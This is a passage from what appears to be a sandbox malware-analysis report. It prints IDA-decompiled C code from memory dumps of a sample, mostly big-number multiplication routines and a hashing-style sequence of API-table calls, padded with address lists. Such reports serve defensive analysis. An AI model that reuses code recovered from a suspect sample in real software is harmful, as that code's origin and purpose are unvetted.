				if(_v16 < _t217) {
					_v8 = _v8 + 1;
				}
				_v12 = _v12 & 0x00000000;
				 *((intOrPtr*)(_t183 + 0x10)) = _t263;
				_t304 = _t167[4] & 0x0000ffff;
				_t339 = _t167[6] & 0x0000ffff;
				_a4 = _t167[5] & 0x0000ffff;
				_t219 = _t167[7] & 0x0000ffff;
				_t340 = _t339 * _t304;
				_v24 = _t304;
				_t220 = _t219 * _a4;
				_t306 = _t219 * _v24;
				_t266 = _t339 * _a4 + _t306;
				if(_t266 < _t306) {
					_t220 = _t220 + 0x10000;
				}
				_t267 = _t266 << 0x10;
				_t341 = _t340 + _t267;
				_t221 = _t220 + (_t266 >> 0x10);
				if(_t341 < _t267) {
					_t221 = _t221 + 1;
				}
				_v16 = _v16 + _t341;
				_a4 = _t221;
				_t268 = _t221;
				if(_v16 < _t341) {
					_t155 = _t221 + 1; // 0x1
					_t268 = _t155;
				}
				_t310 = _v8 + _t268;
				if(_t310 < _t268) {
					_v12 = 1;
				}
				_t270 = _v16 + _t341;
				_t222 = _t221 + 1;
				if(_t222 >= 0) {
					_t222 = _a4;
				}
				_t311 = _t310 + _t222;
				if(_t311 < _t222) {
					_v12 = _v12 + 1;
				}
				 *((intOrPtr*)(_t183 + 0x14)) = _t270;
				_t168 = _t167[6];
				_t342 = _t168 & 0x0000ffff;
				_t169 = _t168 >> 0x10;
				_t272 = _t342 * _t169;
				_t225 = _t169 * _t169 + (_t272 >> 0xf);
				_t273 = _t272 << 0x11;
				_t174 = _t342 * _t342 + _t273;
				if(_t174 < _t273) {
					_t225 = _t225 + 1;
				}
				_t312 = _t311 + _t174;
				if(_t312 < _t174) {
					_t225 = _t225 + 1;
				}
				 *((intOrPtr*)(_t183 + 0x18)) = _t312;
				 *((intOrPtr*)(_t183 + 0x1c)) = _t225 + _v12;
				return _t174;
			}






















































































































    0x003d9f4c
    0x003d9f53
    0x003d9f55
    0x003d9f58
    0x003d9f60
    0x003d9f69
    0x003d9f6f
    0x003d9f71
    0x003d9f76
    0x003d9f78
    0x003d9f78
    0x003d9f7c
    0x003d9f81
    0x003d9f85
    0x003d9f89
    0x003d9f8d
    0x003d9f90
    0x003d9f96
    0x003d9f9d
    0x003d9fa2
    0x003d9fa6
    0x003d9faa
    0x003d9fae
    0x003d9fb0
    0x003d9fb0
    0x003d9fb8
    0x003d9fbe
    0x003d9fc0
    0x003d9fc4
    0x003d9fc6
    0x003d9fc6
    0x003d9fc7
    0x003d9fca
    0x003d9fce
    0x003d9fd0
    0x003d9fd0
    0x003d9fd3
    0x003d9fd7
    0x003d9fd9
    0x003d9fd9
    0x003d9fda
    0x003d9fdf
    0x003d9fe1
    0x003d9fe1
    0x003d9feb
    0x003d9fef
    0x003d9ff2
    0x003d9ff5
    0x003d9ff8
    0x003da000
    0x003da008
    0x003da00e
    0x003da010
    0x003da014
    0x003da016
    0x003da016
    0x003da017
    0x003da01b
    0x003da01d
    0x003da01d
    0x003da01e
    0x003da024
    0x003da026
    0x003da026
    0x003da030
    0x003da034
    0x003da038
    0x003da03b
    0x003da041
    0x003da048
    0x003da04d
    0x003da051
    0x003da055
    0x003da059
    0x003da05b
    0x003da05b
    0x003da063
    0x003da069
    0x003da06b
    0x003da06f
    0x003da071
    0x003da071
    0x003da072
    0x003da074
    0x003da077
    0x003da07b
    0x003da07d
    0x003da07d
    0x003da080
    0x003da086
    0x003da088
    0x003da088
    0x003da08b
    0x003da08f
    0x003da090
    0x003da092
    0x003da092
    0x003da095
    0x003da09b
    0x003da09d
    0x003da09d
    0x003da0a3
    0x003da0a7
    0x003da0ae
    0x003da0b1
    0x003da0b5
    0x003da0b8
    0x003da0be
    0x003da0c5
    0x003da0ca
    0x003da0ce
    0x003da0d2
    0x003da0d6
    0x003da0d8
    0x003da0d8
    0x003da0e0
    0x003da0e6
    0x003da0e8
    0x003da0ec
    0x003da0ee
    0x003da0ee
    0x003da0ef
    0x003da0f2
    0x003da0f7
    0x003da0f9
    0x003da0f9
    0x003da0fc
    0x003da102
    0x003da104
    0x003da104
    0x003da10b
    0x003da111
    0x003da113
    0x003da113
    0x003da114
    0x003da11a
    0x003da11c
    0x003da11c
    0x003da123
    0x003da127
    0x003da12b
    0x003da12e
    0x003da134
    0x003da13b
    0x003da140
    0x003da144
    0x003da148
    0x003da14c
    0x003da14e
    0x003da14e
    0x003da156
    0x003da15c
    0x003da15e
    0x003da162
    0x003da164
    0x003da164
    0x003da165
    0x003da168
    0x003da16d
    0x003da16f
    0x003da16f
    0x003da172
    0x003da178
    0x003da17a
    0x003da17a
    0x003da17d
    0x003da183
    0x003da185
    0x003da185
    0x003da186
    0x003da18c
    0x003da18e
    0x003da18e
    0x003da194
    0x003da197
    0x003da19b
    0x003da19e
    0x003da1a1
    0x003da1a4
    0x003da1ac
    0x003da1b4
    0x003da1ba
    0x003da1bc
    0x003da1c0
    0x003da1c2
    0x003da1c2
    0x003da1c3
    0x003da1c9
    0x003da1cb
    0x003da1cb
    0x003da1cc
    0x003da1d2
    0x003da1d4
    0x003da1d4
    0x003da1df
    0x003da1e3
    0x003da1e7
    0x003da1ea
    0x003da1f0
    0x003da1f7
    0x003da1fc
    0x003da200
    0x003da204
    0x003da208
    0x003da20a
    0x003da20a
    0x003da212
    0x003da218
    0x003da21a
    0x003da21e
    0x003da220
    0x003da220
    0x003da221
    0x003da224
    0x003da227
    0x003da22c
    0x003da22e
    0x003da22e
    0x003da22e
    0x003da231
    0x003da237
    0x003da239
    0x003da239
    0x003da23f
    0x003da243
    0x003da244
    0x003da246
    0x003da246
    0x003da249
    0x003da24f
    0x003da251
    0x003da251
    0x003da254
    0x003da258
    0x003da25f
    0x003da263
    0x003da267
    0x003da26a
    0x003da270
    0x003da277
    0x003da27c
    0x003da280
    0x003da284
    0x003da288
    0x003da28a
    0x003da28a
    0x003da292
    0x003da298
    0x003da29a
    0x003da29e
    0x003da2a0
    0x003da2a0
    0x003da2a1
    0x003da2a4
    0x003da2a7
    0x003da2ac
    0x003da2ae
    0x003da2ae
    0x003da2ae
    0x003da2b4
    0x003da2b8
    0x003da2ba
    0x003da2ba
    0x003da2c4
    0x003da2c8
    0x003da2c9
    0x003da2cb
    0x003da2cb
    0x003da2ce
    0x003da2d2
    0x003da2d4
    0x003da2d4
    0x003da2d7
    0x003da2da
    0x003da2dd
    0x003da2e0
    0x003da2ea
    0x003da2f2
    0x003da2f9
    0x003da2fc
    0x003da300
    0x003da302
    0x003da302
    0x003da303
    0x003da307
    0x003da309
    0x003da309
    0x003da30d
    0x003da312
    0x003da317

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D69E7, Relevance: .2, Instructions: 207Crypto
    C-Code - Quality: 100%
    			E003D69E7(intOrPtr* __ecx, unsigned int* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				unsigned int _t64;
				signed int _t67;
				signed int _t70;
				intOrPtr _t71;
				signed int _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				intOrPtr _t76;
				signed int _t77;
				signed int _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;
				signed int _t82;
				signed int _t83;
				void* _t84;
				void* _t85;
				intOrPtr _t86;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				unsigned int* _t95;
				void* _t96;
				intOrPtr* _t97;
				unsigned int _t100;
				unsigned int _t104;
				signed int _t105;
				unsigned int _t106;
				unsigned int _t110;
				signed int _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				unsigned int _t114;
				unsigned int _t118;
				signed int _t119;
				signed int _t120;
				intOrPtr _t121;
				unsigned int _t122;
				unsigned int _t126;
				signed int _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				unsigned int _t130;
				unsigned int _t134;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				intOrPtr _t139;
				signed int _t141;
				signed int _t145;
				signed int _t149;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t158;
				signed int _t159;
				void* _t160;
				void* _t161;
				intOrPtr _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				void* _t175;
				void* _t176;
				intOrPtr _t177;

				_t97 = __ecx;
				_v16 = _v16 & 0x00000000;
				_t95 = __edx;
				if(_a4 > 0) {
					_v8 = _t64 & 0x0000ffff;
					_v12 = _t64 >> 0x10;
					while((_a4 & 0xfffffffc) != 0) {
						_t100 =  *_t95;
						_t158 = _t100 & 0x0000ffff;
						_t137 = _t100 >> 0x10;
						_t159 = _t158 * _v8;
						_t138 = _t137 * _v12;
						_t67 = _t137 * _v8;
						_t104 = _t158 * _v12 + _t67;
						if(_t104 < _t67) {
							_t138 = _t138 + 0x10000;
						}
						_t105 = _t104 << 0x10;
						_t160 = _t159 + _t105;
						_t139 = _t138 + (_t104 >> 0x10);
						if(_t160 < _t105) {
							_t139 = _t139 + 1;
						}
						_t70 = _v16;
						_t161 = _t160 + _t70;
						_v20 = _t139;
						if(_t161 < _t70) {
							_v20 = _t139 + 1;
						}
						_t71 =  *_t97;
						_t162 = _t161 + _t71;
						if(_t162 < _t71) {
							_v20 = _v20 + 1;
						}
						 *_t97 = _t162;
						_t106 = _t95[1];
						_t72 = _t106 & 0x0000ffff;
						_t163 = _t106 >> 0x10;
						_t73 = _t72 * _v8;
						_t164 = _t163 * _v12;
						_t141 = _t163 * _v8;
						_t110 = _t72 * _v12 + _t141;
						if(_t110 < _t141) {
							_t164 = _t164 + 0x10000;
						}
						_t111 = _t110 << 0x10;
						_t74 = _t73 + _t111;
						_t165 = _t164 + (_t110 >> 0x10);
						if(_t74 < _t111) {
							_t165 = _t165 + 1;
						}
						_t112 = _v20;
						_t75 = _t74 + _t112;
						_v16 = _t165;
						if(_t75 < _t112) {
							_v16 = _t165 + 1;
						}
						_t113 =  *((intOrPtr*)(_t97 + 4));
						_t76 = _t75 + _t113;
						if(_t76 < _t113) {
							_v16 = _v16 + 1;
						}
						 *((intOrPtr*)(_t97 + 4)) = _t76;
						_t114 = _t95[2];
						_t77 = _t114 & 0x0000ffff;
						_t166 = _t114 >> 0x10;
						_t78 = _t77 * _v8;
						_t167 = _t166 * _v12;
						_t145 = _t166 * _v8;
						_t118 = _t77 * _v12 + _t145;
						if(_t118 < _t145) {
							_t167 = _t167 + 0x10000;
						}
						_t119 = _t118 << 0x10;
						_t79 = _t78 + _t119;
						_t168 = _t167 + (_t118 >> 0x10);
						if(_t79 < _t119) {
							_t168 = _t168 + 1;
						}
						_t120 = _v16;
						_t80 = _t79 + _t120;
						_v20 = _t168;
						if(_t80 < _t120) {
							_v20 = _t168 + 1;
						}
						_t121 =  *((intOrPtr*)(_t97 + 8));
						_t81 = _t80 + _t121;
						if(_t81 < _t121) {
							_v20 = _v20 + 1;
						}
						 *((intOrPtr*)(_t97 + 8)) = _t81;
						_t122 = _t95[3];
						_t82 = _t122 & 0x0000ffff;
						_t169 = _t122 >> 0x10;
						_t83 = _t82 * _v8;
						_t170 = _t169 * _v12;
						_t149 = _t169 * _v8;
						_t126 = _t82 * _v12 + _t149;
						if(_t126 < _t149) {
							_t170 = _t170 + 0x10000;
						}
						_t127 = _t126 << 0x10;
						_t84 = _t83 + _t127;
						_t171 = _t170 + (_t126 >> 0x10);
						if(_t84 < _t127) {
							_t171 = _t171 + 1;
						}
						_t128 = _v20;
						_t85 = _t84 + _t128;
						if(_t85 < _t128) {
							_t171 = _t171 + 1;
						}
						_t129 =  *((intOrPtr*)(_t97 + 0xc));
						_t86 = _t85 + _t129;
						if(_t86 < _t129) {
							_t171 = _t171 + 1;
						}
						 *((intOrPtr*)(_t97 + 0xc)) = _t86;
						_t95 =  &(_t95[4]);
						_t97 = _t97 + 0x10;
						_a4 = _a4 - 4;
						_v16 = _t171;
					}
					if(_a4 == 0) {
						L48:
						return _v16;
					}
					_t96 = _t95 - _t97;
					do {
						_t130 =  *(_t96 + _t97);
						_t173 = _t130 & 0x0000ffff;
						_t153 = _t130 >> 0x10;
						_t174 = _t173 * _v8;
						_t154 = _t153 * _v12;
						_t89 = _t153 * _v8;
						_t134 = _t173 * _v12 + _t89;
						if(_t134 < _t89) {
							_t154 = _t154 + 0x10000;
						}
						_t135 = _t134 << 0x10;
						_t175 = _t174 + _t135;
						_t155 = _t154 + (_t134 >> 0x10);
						if(_t175 < _t135) {
							_t155 = _t155 + 1;
						}
						_t92 = _v16;
						_t176 = _t175 + _t92;
						if(_t176 < _t92) {
							_t155 = _t155 + 1;
						}
						_t93 =  *_t97;
						_t177 = _t176 + _t93;
						if(_t177 < _t93) {
							_t155 = _t155 + 1;
						}
						 *_t97 = _t177;
						_t97 = _t97 + 4;
						_t60 =  &_a4;
						 *_t60 = _a4 - 1;
						_v16 = _t155;
					} while ( *_t60 != 0);
					goto L48;
				}
				return 0;
			}

















































































    0x003d69e7
    0x003d69ed
    0x003d69f6
    0x003d69f8
    0x003d6a09
    0x003d6a0c
    0x003d6b82
    0x003d6a14
    0x003d6a16
    0x003d6a1c
    0x003d6a20
    0x003d6a2a
    0x003d6a2e
    0x003d6a32
    0x003d6a36
    0x003d6a38
    0x003d6a38
    0x003d6a40
    0x003d6a46
    0x003d6a48
    0x003d6a4c
    0x003d6a4e
    0x003d6a4e
    0x003d6a4f
    0x003d6a52
    0x003d6a54
    0x003d6a59
    0x003d6a5c
    0x003d6a5c
    0x003d6a5f
    0x003d6a61
    0x003d6a65
    0x003d6a67
    0x003d6a67
    0x003d6a6a
    0x003d6a6c
    0x003d6a6f
    0x003d6a75
    0x003d6a79
    0x003d6a83
    0x003d6a87
    0x003d6a8b
    0x003d6a8f
    0x003d6a91
    0x003d6a91
    0x003d6a99
    0x003d6a9f
    0x003d6aa1
    0x003d6aa5
    0x003d6aa7
    0x003d6aa7
    0x003d6aa8
    0x003d6aab
    0x003d6aad
    0x003d6ab2
    0x003d6ab5
    0x003d6ab5
    0x003d6ab8
    0x003d6abb
    0x003d6abf
    0x003d6ac1
    0x003d6ac1
    0x003d6ac4
    0x003d6ac7
    0x003d6aca
    0x003d6ad0
    0x003d6ad4
    0x003d6ade
    0x003d6ae2
    0x003d6ae6
    0x003d6aea
    0x003d6aec
    0x003d6aec
    0x003d6af4
    0x003d6afa
    0x003d6afc
    0x003d6b00
    0x003d6b02
    0x003d6b02
    0x003d6b03
    0x003d6b06
    0x003d6b08
    0x003d6b0d
    0x003d6b10
    0x003d6b10
    0x003d6b13
    0x003d6b16
    0x003d6b1a
    0x003d6b1c
    0x003d6b1c
    0x003d6b1f
    0x003d6b22
    0x003d6b25
    0x003d6b2b
    0x003d6b2f
    0x003d6b39
    0x003d6b3d
    0x003d6b41
    0x003d6b45
    0x003d6b47
    0x003d6b47
    0x003d6b4f
    0x003d6b55
    0x003d6b57
    0x003d6b5b
    0x003d6b5d
    0x003d6b5d
    0x003d6b5e
    0x003d6b61
    0x003d6b65
    0x003d6b67
    0x003d6b67
    0x003d6b68
    0x003d6b6b
    0x003d6b6f
    0x003d6b71
    0x003d6b71
    0x003d6b72
    0x003d6b75
    0x003d6b78
    0x003d6b7b
    0x003d6b7f
    0x003d6b7f
    0x003d6b93
    0x003d6bf3
    0x00000000
    0x003d6bf7
    0x003d6b95
    0x003d6b97
    0x003d6b97
    0x003d6b9a
    0x003d6ba0
    0x003d6ba4
    0x003d6bae
    0x003d6bb2
    0x003d6bb6
    0x003d6bba
    0x003d6bbc
    0x003d6bbc
    0x003d6bc4
    0x003d6bca
    0x003d6bcc
    0x003d6bd0
    0x003d6bd2
    0x003d6bd2
    0x003d6bd3
    0x003d6bd6
    0x003d6bda
    0x003d6bdc
    0x003d6bdc
    0x003d6bdd
    0x003d6bdf
    0x003d6be3
    0x003d6be5
    0x003d6be5
    0x003d6be6
    0x003d6be8
    0x003d6beb
    0x003d6beb
    0x003d6bee
    0x003d6bee
    0x00000000
    0x003d6b97
    0x00000000

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D6BFB, Relevance: .2, Instructions: 183Crypto
    C-Code - Quality: 100%
    			E003D6BFB(unsigned int* __ecx, intOrPtr* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				unsigned int _t55;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				void* _t64;
				intOrPtr _t65;
				signed int _t66;
				signed int _t67;
				void* _t68;
				intOrPtr _t69;
				signed int _t70;
				signed int _t71;
				void* _t72;
				intOrPtr _t73;
				signed int _t76;
				signed int _t79;
				intOrPtr* _t81;
				void* _t82;
				unsigned int _t85;
				unsigned int _t89;
				signed int _t90;
				unsigned int _t91;
				unsigned int _t95;
				signed int _t96;
				intOrPtr _t97;
				unsigned int _t98;
				unsigned int _t102;
				signed int _t103;
				signed int _t104;
				unsigned int _t105;
				unsigned int _t109;
				signed int _t110;
				intOrPtr _t111;
				unsigned int _t112;
				unsigned int _t116;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				void* _t121;
				intOrPtr _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				intOrPtr _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				void* _t134;
				intOrPtr _t135;
				signed int _t139;
				signed int _t140;
				intOrPtr _t141;
				signed int _t143;
				signed int _t147;
				signed int _t151;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				unsigned int* _t159;

				_v16 = _v16 & 0x00000000;
				_t159 = __ecx;
				_t81 = __edx;
				if(_a4 > 0) {
					_v8 = _t55 & 0x0000ffff;
					_v12 = _t55 >> 0x10;
					while((_a4 & 0xfffffffc) != 0) {
						_t85 =  *_t159;
						_t119 = _t85 & 0x0000ffff;
						_t139 = _t85 >> 0x10;
						_t120 = _t119 * _v8;
						_t140 = _t139 * _v12;
						_t58 = _t139 * _v8;
						_t89 = _t119 * _v12 + _t58;
						if(_t89 < _t58) {
							_t140 = _t140 + 0x10000;
						}
						_t90 = _t89 << 0x10;
						_t121 = _t120 + _t90;
						_t141 = _t140 + (_t89 >> 0x10);
						if(_t121 < _t90) {
							_t141 = _t141 + 1;
						}
						_t61 = _v16;
						_t122 = _t121 + _t61;
						_v20 = _t141;
						if(_t122 < _t61) {
							_v20 = _t141 + 1;
						}
						 *_t81 = _t122;
						_t91 = _t159[1];
						_t62 = _t91 & 0x0000ffff;
						_t123 = _t91 >> 0x10;
						_t63 = _t62 * _v8;
						_t124 = _t123 * _v12;
						_t143 = _t123 * _v8;
						_t95 = _t62 * _v12 + _t143;
						if(_t95 < _t143) {
							_t124 = _t124 + 0x10000;
						}
						_t96 = _t95 << 0x10;
						_t64 = _t63 + _t96;
						_t125 = _t124 + (_t95 >> 0x10);
						if(_t64 < _t96) {
							_t125 = _t125 + 1;
						}
						_t97 = _v20;
						_t65 = _t64 + _t97;
						_v16 = _t125;
						if(_t65 < _t97) {
							_v16 = _t125 + 1;
						}
						 *((intOrPtr*)(_t81 + 4)) = _t65;
						_t98 = _t159[2];
						_t66 = _t98 & 0x0000ffff;
						_t126 = _t98 >> 0x10;
						_t67 = _t66 * _v8;
						_t127 = _t126 * _v12;
						_t147 = _t126 * _v8;
						_t102 = _t66 * _v12 + _t147;
						if(_t102 < _t147) {
							_t127 = _t127 + 0x10000;
						}
						_t103 = _t102 << 0x10;
						_t68 = _t67 + _t103;
						_t128 = _t127 + (_t102 >> 0x10);
						if(_t68 < _t103) {
							_t128 = _t128 + 1;
						}
						_t104 = _v16;
						_t69 = _t68 + _t104;
						_v20 = _t128;
						if(_t69 < _t104) {
							_v20 = _t128 + 1;
						}
						 *((intOrPtr*)(_t81 + 8)) = _t69;
						_t105 = _t159[3];
						_t70 = _t105 & 0x0000ffff;
						_t129 = _t105 >> 0x10;
						_t71 = _t70 * _v8;
						_t130 = _t129 * _v12;
						_t151 = _t129 * _v8;
						_t109 = _t70 * _v12 + _t151;
						if(_t109 < _t151) {
							_t130 = _t130 + 0x10000;
						}
						_t110 = _t109 << 0x10;
						_t72 = _t71 + _t110;
						_t131 = _t130 + (_t109 >> 0x10);
						if(_t72 < _t110) {
							_t131 = _t131 + 1;
						}
						_t111 = _v20;
						_t73 = _t72 + _t111;
						if(_t73 < _t111) {
							_t131 = _t131 + 1;
						}
						 *((intOrPtr*)(_t81 + 0xc)) = _t73;
						_t159 =  &(_t159[4]);
						_t81 = _t81 + 0x10;
						_a4 = _a4 - 4;
						_v16 = _t131;
					}
					if(_a4 == 0) {
						L38:
						return _v16;
					}
					_t82 = _t81 - _t159;
					do {
						_t112 =  *_t159;
						_t132 = _t112 & 0x0000ffff;
						_t155 = _t112 >> 0x10;
						_t133 = _t132 * _v8;
						_t156 = _t155 * _v12;
						_t76 = _t155 * _v8;
						_t116 = _t132 * _v12 + _t76;
						if(_t116 < _t76) {
							_t156 = _t156 + 0x10000;
						}
						_t117 = _t116 << 0x10;
						_t134 = _t133 + _t117;
						_t157 = _t156 + (_t116 >> 0x10);
						if(_t134 < _t117) {
							_t157 = _t157 + 1;
						}
						_t79 = _v16;
						_t135 = _t134 + _t79;
						if(_t135 < _t79) {
							_t157 = _t157 + 1;
						}
						 *((intOrPtr*)(_t82 + _t159)) = _t135;
						_t159 =  &(_t159[1]);
						_t51 =  &_a4;
						 *_t51 = _a4 - 1;
						_v16 = _t157;
					} while ( *_t51 != 0);
					goto L38;
				}
				return 0;
			}







































































    0x003d6c01
    0x003d6c0b
    0x003d6c0d
    0x003d6c0f
    0x003d6c1f
    0x003d6c22
    0x003d6d6b
    0x003d6c2a
    0x003d6c2c
    0x003d6c32
    0x003d6c36
    0x003d6c40
    0x003d6c44
    0x003d6c48
    0x003d6c4c
    0x003d6c4e
    0x003d6c4e
    0x003d6c56
    0x003d6c5c
    0x003d6c5e
    0x003d6c62
    0x003d6c64
    0x003d6c64
    0x003d6c65
    0x003d6c68
    0x003d6c6a
    0x003d6c6f
    0x003d6c72
    0x003d6c72
    0x003d6c75
    0x003d6c77
    0x003d6c7a
    0x003d6c80
    0x003d6c84
    0x003d6c8e
    0x003d6c92
    0x003d6c96
    0x003d6c9a
    0x003d6c9c
    0x003d6c9c
    0x003d6ca4
    0x003d6caa
    0x003d6cac
    0x003d6cb0
    0x003d6cb2
    0x003d6cb2
    0x003d6cb3
    0x003d6cb6
    0x003d6cb8
    0x003d6cbd
    0x003d6cc0
    0x003d6cc0
    0x003d6cc3
    0x003d6cc6
    0x003d6cc9
    0x003d6ccf
    0x003d6cd3
    0x003d6cdd
    0x003d6ce1
    0x003d6ce5
    0x003d6ce9
    0x003d6ceb
    0x003d6ceb
    0x003d6cf3
    0x003d6cf9
    0x003d6cfb
    0x003d6cff
    0x003d6d01
    0x003d6d01
    0x003d6d02
    0x003d6d05
    0x003d6d07
    0x003d6d0c
    0x003d6d0f
    0x003d6d0f
    0x003d6d12
    0x003d6d15
    0x003d6d18
    0x003d6d1e
    0x003d6d22
    0x003d6d2c
    0x003d6d30
    0x003d6d34
    0x003d6d38
    0x003d6d3a
    0x003d6d3a
    0x003d6d42
    0x003d6d48
    0x003d6d4a
    0x003d6d4e
    0x003d6d50
    0x003d6d50
    0x003d6d51
    0x003d6d54
    0x003d6d58
    0x003d6d5a
    0x003d6d5a
    0x003d6d5b
    0x003d6d5e
    0x003d6d61
    0x003d6d64
    0x003d6d68
    0x003d6d68
    0x003d6d7c
    0x003d6dd3
    0x00000000
    0x003d6dd6
    0x003d6d7e
    0x003d6d80
    0x003d6d80
    0x003d6d82
    0x003d6d88
    0x003d6d8c
    0x003d6d96
    0x003d6d9a
    0x003d6d9e
    0x003d6da2
    0x003d6da4
    0x003d6da4
    0x003d6dac
    0x003d6db2
    0x003d6db4
    0x003d6db8
    0x003d6dba
    0x003d6dba
    0x003d6dbb
    0x003d6dbe
    0x003d6dc2
    0x003d6dc4
    0x003d6dc4
    0x003d6dc5
    0x003d6dc8
    0x003d6dcb
    0x003d6dcb
    0x003d6dce
    0x003d6dce
    0x00000000
    0x003d6d80
    0x00000000

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CF720, Relevance: .1, Instructions: 115
    C-Code - Quality: 46%
    			E003CF720(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t42;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				void* _t76;

				_t55 =  *0x3e8628; // 0x622508
				_push(0xf0000000);
				_push(0x18);
				_push(0);
				_push(0);
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_push( &_v16);
				_t76 = 0;
				_t54 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x180))))() != 0) {
					_push( &_v8);
					_t42 =  *0x3e8628; // 0x622508
					_push(0);
					_push(0);
					_push(_a20);
					_push(_v16);
					if( *((intOrPtr*)( *((intOrPtr*)(_t42 + 0x16c))))() != 0) {
						_push(0);
						_push(_a8);
						_t71 =  *0x3e8628; // 0x622508
						_push(_a4);
						_push(_v8);
						if( *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x160))))() != 0) {
							_push(0);
							_push( &_v20);
							_t62 =  *0x3e8628; // 0x622508
							_push( &_v12);
							_push(4);
							_v20 = 4;
							_push(_v8);
							if( *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x184))))() != 0) {
								_t76 = E003D1D90(_v12, 0);
								if(_t76 != 0) {
									_t51 =  *0x3e8628; // 0x622508
									_push(0);
									_push( &_v12);
									_push(_t76);
									_push(2);
									_push(_v8);
									if( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x184))))() == 0) {
										E003CBB40(_t76);
									} else {
										_t54 = 1;
									}
								}
							}
						}
					}
				}
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x164))))(_t34);
				}
				_t35 = _v16;
				if(_t35 != 0) {
					_t57 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x178))))(_t35, 0);
				}
				 *_a12 = _t76;
				 *_a16 = _v12;
				return _t54;
			}


















    0x003cf726
    0x003cf72f
    0x003cf736
    0x003cf738
    0x003cf739
    0x003cf73d
    0x003cf740
    0x003cf743
    0x003cf746
    0x003cf74f
    0x003cf750
    0x003cf752
    0x003cf758
    0x003cf767
    0x003cf768
    0x003cf76d
    0x003cf76e
    0x003cf76f
    0x003cf776
    0x003cf77b
    0x003cf78a
    0x003cf78b
    0x003cf78c
    0x003cf792
    0x003cf799
    0x003cf79e
    0x003cf7a3
    0x003cf7a7
    0x003cf7a8
    0x003cf7b1
    0x003cf7b2
    0x003cf7b4
    0x003cf7c1
    0x003cf7c6
    0x003cf7d2
    0x003cf7d9
    0x003cf7de
    0x003cf7e3
    0x003cf7e7
    0x003cf7ee
    0x003cf7ef
    0x003cf7f1
    0x003cf7f6
    0x003cf7fe
    0x003cf7f8
    0x003cf7f8
    0x003cf7f8
    0x003cf7f6
    0x003cf7d9
    0x003cf7c6
    0x003cf79e
    0x003cf77b
    0x003cf806
    0x003cf80b
    0x003cf80d
    0x003cf81a
    0x003cf81a
    0x003cf81c
    0x003cf821
    0x003cf823
    0x003cf831
    0x003cf831
    0x003cf83c
    0x003cf842
    0x003cf848

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CF310, Relevance: .1, Instructions: 80
    C-Code - Quality: 81%
    			E003CF310(intOrPtr _a4, char _a8, signed short** _a12, signed short** _a16) {
				intOrPtr _t16;
				void* _t17;
				signed short* _t23;
				intOrPtr _t28;
				signed short* _t32;
